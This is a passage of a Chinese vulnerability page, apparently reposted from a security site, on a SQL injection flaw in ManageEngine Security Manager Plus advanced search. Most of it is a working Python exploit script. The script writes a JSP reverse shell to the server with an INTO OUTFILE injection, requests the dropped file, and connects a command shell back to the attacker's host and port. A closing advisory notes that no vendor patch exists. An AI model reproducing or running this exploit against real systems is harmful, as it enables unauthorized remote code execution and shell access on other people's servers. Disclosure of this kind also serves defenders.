ManageEngine Security Manager Plus高级搜索SQL注入漏洞(5)

try
                {
                    Socket socket = new Socket( "''' + lhost +'''", '''+lport+''' );
                    Process process = Runtime.getRuntime().exec( "'''+command+'''" );
                    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
                    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
                } catch( Exception e ) {}
            %>'''


jsp = jsp.replace("\n","")
jsp = jsp.replace("\t","")

payload = "1)) "
payload += 'UNION SELECT 0x%s,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,21,22,23,24,25,26,27,28,29 INTO OUTFILE "%s"' % (jsp.encode('hex'),output_path)
payload += " FROM mysql.user WHERE 1=((1"

opener = urllib2.build_opener()
opener.addheaders.append(('Cookie', 'STATE_COOKIE=%26SecurityManager%2FID%2F174%2FHomePageSubDAC_LIST%2F223%2FSecurityManager_CONTENTAREA_LIST%2F226%2FMainDAC_LIST%2F166%26MainTabs%2FID%2F167%2F_PV%2F174%2FselectedView%2FHome%26Home%2FID%2F166%2FPDCA%2FMainDAC%2F_PV%2F174%26HomePageSub%2FID%2F226%2FPDCA%2FSecurityManager_CONTENTAREA%2F_PV%2F166%26HomePageSubTab%2FID%2F225%2F_PV%2F226%2FselectedView%2FHomePageSecurity%26HomePageSecurity%2FID%2F223%2FPDCA%2FHomePageSubDAC%2F_PV%2F226%26_REQS%2F_RVID%2FSecurityManager%2F_TIME%2F31337; 2RequestsshowThreadedReq=showThreadedReqshow; 2RequestshideThreadedReq=hideThreadedReqhide;'))
post_params = urllib.urlencode({'ANDOR' : 'and', 'condition_1' : 'OpenPorts@PORT','operator_1' : 'IN', 'value_1' : payload, 'COUNT' : '1'})

print "[*] Sending evil payload"
resp = opener.open("http://%s:6262/STATE_ID/31337/jsp/xmlhttp/persistence.jsp?reqType=AdvanceSearch&SUBREQUEST=XMLHTTP" %rhost, post_params)
print "[*] Created Reverse JSP shell %s:6262/%s" % (rhost,filename)
resp = opener.open("http://%s:6262/%s"  % (rhost,filename))
print "[*] Check your shell on %s %s\n" % (lhost,lport)

建议:
--------------------------------------------------------------------------------
厂商补丁:

ManageEngine
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wyfjwp.html